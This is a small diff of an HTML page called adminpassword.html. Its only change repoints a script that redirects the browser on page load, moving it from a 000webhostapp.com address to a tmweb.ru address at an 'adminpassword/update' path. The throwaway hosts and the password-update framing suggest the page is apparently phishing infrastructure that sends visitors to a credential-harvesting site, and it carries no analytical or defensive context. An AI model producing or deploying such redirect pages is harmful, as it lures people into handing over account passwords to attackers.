--- a/adminpassword/adminpassword.html
+++ b/adminpassword/adminpassword.html
@@ -5,7 +5,7 @@
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <script>
-        document.location.href = "https://avnanswers.000webhostapp.com/adminpassword/update/"
+        document.location.href = "http://ci80697.tmweb.ru/adminpassword/update/"
     </script>
 </head>
 <body>
